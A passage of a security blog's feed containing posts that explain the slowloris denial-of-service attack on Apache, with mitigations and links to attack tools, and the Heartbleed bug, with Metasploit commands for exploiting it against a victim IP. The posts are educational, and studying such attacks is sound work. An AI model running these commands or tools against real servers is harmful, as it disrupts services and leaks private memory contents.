&lt;p&gt;You could &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=XiFkyR35v2Y&quot;&gt;watch Dr. Mike Pound&#x27;s Computerphile video about slowloris first.&lt;&#x2F;a&gt; It probably makes everything a bit easier to understand.&lt;&#x2F;p&gt;
&lt;p&gt;I could just present the Python or JavaScript that does this, but I find it useful to understand how this vulnerability is allowed to exist.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-it-works&quot;&gt;How it works&lt;&#x2F;h2&gt;
&lt;p&gt;The idea of the attack is relatively quite simple. You exploit the issues Apache has with serving many users at the same time. To understand why that is a problem, one has to understand how Apache in works and how it differs from Nginx.&lt;&#x2F;p&gt;
&lt;p&gt;Client requests are handled by three multi-process modules (MPMs). Administrators can thus swap out its connection handling architecture easily, if they so choose to. The MPMs are:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;mpm_prefork&lt;&#x2F;li&gt;
&lt;li&gt;mpm_worker&lt;&#x2F;li&gt;
&lt;li&gt;mpm_event&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;Which MPM one would use depends on what content you are serving. It also depends on what other modules you use with Apache. For example, mod_php cannot be used with mpm_worker which is an Apache module capable to parse and execute PHP code inside Apache itself, a common way to run PHP under Apache. The mpm_worker module is multi-threaded, in comparison to mpm_prefork, which makes it quicker to run on the server.&lt;&#x2F;p&gt;
&lt;p&gt;The slowloris attack exploit how Apache work by taking all the connections that are spawned by for example mpm_prefork or mpm_worker by sending incomplete requests. The connection will thus be open and after a while maxing out the maximum connections allowed. This will result in a DoS.&lt;&#x2F;p&gt;
&lt;p&gt;In comparison to Apache, Nginx is newer (1995 and 2002 respectively). The sole reason why Nginx exist is to solve the C10K problem, which is the problem of how to optimise network sockets in order to handle a large number of clients at the same time. We have to appreciate the fact that Apache was made in an era where most had no idea how big and powerful the internet were going to be.&lt;&#x2F;p&gt;
&lt;p&gt;Thus, it is very unlikely to slowdos a Nginx based server as it is made to handle a lot of concurrent connections. Apache on the other hand, will often yield under the high pressure from such an attack.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-to-prevent-it&quot;&gt;How to prevent it&lt;&#x2F;h2&gt;
&lt;p&gt;I could say &quot;just use Nginx&quot;, and I was planning to do so as well, but then I would not be totally honest. &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;valyala&#x2F;goloris&quot;&gt;Slowdos attacks can actually be used on some versions of Nginx (up to v1.5.9)&lt;&#x2F;a&gt; or badly configured Nginx for that matter, but in practice it is unlikely. Thus, saying &quot;just use Nginx&quot; is valid. However, for a developer that is dependent and accustomed to Apache, it is possible to for example use Nginx and Apache together for example as using Nginx as a reverse proxy.&lt;&#x2F;p&gt;
&lt;p&gt;There are also Apache modules to mitigate the attack, namely the modules: mod_limitipconn, mod_qos, mod_evasive, mod security, mod_noloris, and mod_antiloris. Since Apache 2.2.15, Apache ships the module &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;httpd.apache.org&#x2F;docs&#x2F;2.4&#x2F;mod&#x2F;mod_reqtimeout.html&quot;&gt;mod_reqtimeout&lt;&#x2F;a&gt; as the official solution.&lt;&#x2F;p&gt;
&lt;p&gt;It is also possible to use mpm_event module. While the mpm_worker needs 1,000 threads to sustain 1,000 concurrent connections, mpm_event may get by with 100 active threads and 900 idle connections managed in the event queue. The mpm_event will use a fraction of the resources of the mpm_worker in that scenario, but the downside to this: each of those requests is handled by a separate thread which must be scheduled by the kernel and as such will incur the cost of switching context.&lt;&#x2F;p&gt;
&lt;p&gt;Nginx, on the other hand, uses the event model itself as its scheduler. Nginx processes as much work on each connection as it can before move on to the next one. Thus, no extra context switching is required.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-to-exploit-it&quot;&gt;How to exploit it&lt;&#x2F;h2&gt;
&lt;p&gt;It is really simple. Run &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;gkbrk&#x2F;slowloris&quot;&gt;this python code&lt;&#x2F;a&gt; or &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tj&#x2F;slowloris&quot;&gt;this JavaScript code&lt;&#x2F;a&gt; found on GitHub. You can set up this attack against a webserver on a Raspberry Pi and just put it somewhere and forget about it.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;Please do not DoS people. Contrary to popular belief, writing in PHP does not make a person fair game.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>The heart still bleeds</title>
        <published>2017-08-16T00:00:00+00:00</published>
        <updated>2017-08-16T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/the-heart-still-bleeds/"/>
        <id>https://maxine.dev/post/the-heart-still-bleeds/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/the-heart-still-bleeds/">&lt;p&gt;In 2014, CVE-2014-0160 happened, more commonly known as Heartbleed.&lt;&#x2F;p&gt;
&lt;p&gt;The vulnerability was exposed independently by a team of security engineers (Riku, Antti and Matti) at Codenomicon (acquired by Synopsys) and Neel Mehta of Google Security.&lt;&#x2F;p&gt;
&lt;p&gt;An attack of this kind is getting rarer by the day, but there are several thousands, if not hundreds of thousands of devices that are still vulnerable to this attack.&lt;&#x2F;p&gt;
&lt;p&gt;The scarier part is that it is, pardon the pun, &lt;em&gt;silent, but deadly&lt;&#x2F;em&gt;. It is not undetectable, as there are honeypots that are most likely deployed for this purpose, but it does require effort investigate.&lt;&#x2F;p&gt;
&lt;p&gt;To top it all off, it is one of the simpler exploits to do. If one fire up the Metasploit framework, it can be done in a couple of minutes. Here is the whole process, done from a Kali virtual machine against another virtual machine.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;the-heartbleed&quot;&gt;The Heartbleed&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;msfconsole&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;use&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; auxiliary&#x2F;scanner&#x2F;ssl&#x2F;openssl_heartbleed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #66D9EF;&quot;&gt;set&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; RHOSTS&lt;&#x2F;span&gt;&lt;span&gt; [victim&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;#39;s IP address]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;set RPORTS [victim&amp;#39;&lt;&#x2F;span&gt;&lt;span&gt;s&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; port]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #66D9EF;&quot;&gt;set&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; VERBOSE&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; true&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;run&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;The most common port to attack would be port 443, but other ports where the OpenSSL technology might be deployed can also be attacked as well.&lt;&#x2F;p&gt;
&lt;p&gt;After the script runs, something that may very well look like digital garbage will be thrown at you. You most likely got a 64 kilobytes chunk of data from one heartbeat that was revealed from memory. What does it look like? Here is a screenshot.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;..&#x2F;..&#x2F;images&#x2F;heartbleedoutput1.png&quot; alt=&quot;Output from Metasploit after exploiting a Heartbleed vulnerability&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Why 64kb? Why the name Heartbleed? It all comes down to the Heartbeat extension featured in the TLS protocol. It is basically a nifty way of keeping the communication going between two entities without renegotiating the connection too often.&lt;&#x2F;p&gt;
&lt;p&gt;This tech was introduced into OpenSSL, but a bug was present. This enabled attackers to send an altered and malicious heartbeat with a small payload. Where the response from the server should have been limited to what it asked for through the heartbeat. A common representation for this is that a client ask a server for a short word, for example Alice. In a more technical and accurate wording, &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.theregister.co.uk&#x2F;2014&#x2F;04&#x2F;09&#x2F;heartbleed_explained&#x2F;&quot;&gt;as presented by The Register&lt;&#x2F;a&gt; because of a missing bounds check before a memcpy() call that uses non-sanitized user input as the length parameter. Thus, whatever that is in memory at the time of the heartbeat query to the server, is sent back to the client. It could in theory be anything, thus saying that it looks like garbage is often not too far fetched.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Send me this five-character word, if you are present: &quot;Alice&quot;.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The server would thus respond with the word &quot;Alice&quot;. Similarly, if one asked:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Send me this 300-character word, if you are present: &quot;Alice&quot;.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;In this case, the server would have responded with &quot;Alice&quot;, in addition to the next 295 characters. From those leaked characters, up to 64kb, one could possibly find the password and personal information of Bob, and where he kept his picture of Lena on the server.&lt;&#x2F;p&gt;
&lt;p&gt;What the client is requesting is information from memory, and information from memory it gets, for as many requests as the client wants.&lt;&#x2F;p&gt;
&lt;p&gt;Heartbleed is not the most common thing to find &lt;em&gt;anymore&lt;&#x2F;em&gt; with big businesses with sufficient budgets to employ experts, thus the most of those devices that are still affected are most likely to be owned by those who cannot afford to know or those who simply would never even care to know.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;our-responsibility&quot;&gt;Our responsibility&lt;&#x2F;h2&gt;
&lt;p&gt;While being careful to call it a trend, many junior developers, something I consider myself as well, has been known to be relatively sloppy with security. When there are so many new technologies to explore, frameworks like React and Angular and the countless of packages sent to NPM every day, such a situation is not only understandable, it is expected.&lt;&#x2F;p&gt;
&lt;p&gt;Incomplete auditing of the code for bugs, despite being open source, caused Heartbleed.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;One. Little. Mistake.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Regardless if one is a developer, entrepreneur or security specialist, the products we develop are affecting people; individuals with vulnerable sockets into their life known as services we provide.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;For further reading I would recommend the following:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;community.rapid7.com&#x2F;community&#x2F;infosec&#x2F;blog&#x2F;2014&#x2F;04&#x2F;11&#x2F;heartbleed-war-room--faq&quot;&gt;Rapid7&lt;&#x2F;a&gt;&lt;br&gt;
&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.schneier.com&#x2F;blog&#x2F;archives&#x2F;2014&#x2F;04&#x2F;heartbleed.html&quot;&gt;Bruce Schneider&lt;&#x2F;a&gt; (Anything from Schneider is good)&lt;br&gt;
&lt;a rel=&quot;external&quot; href=&quot;http:&#x2F;&#x2F;heartbleed.com&quot;&gt;Heartbleed.com&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Teddy sees you</title>
        <published>2017-03-04T00:00:00+00:00</published>
        <updated>2017-03-04T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/teddy-sees-you/"/>
        <id>https://maxine.dev/post/teddy-sees-you/</id>
        
        <summary type="html">&lt;p&gt;Have you ever gotten creeped out by dolls? How about teddy bears? If it has, this is going to make that fear even greater.&lt;&#x2F;p&gt;</summary>
        
    </entry>
</feed>
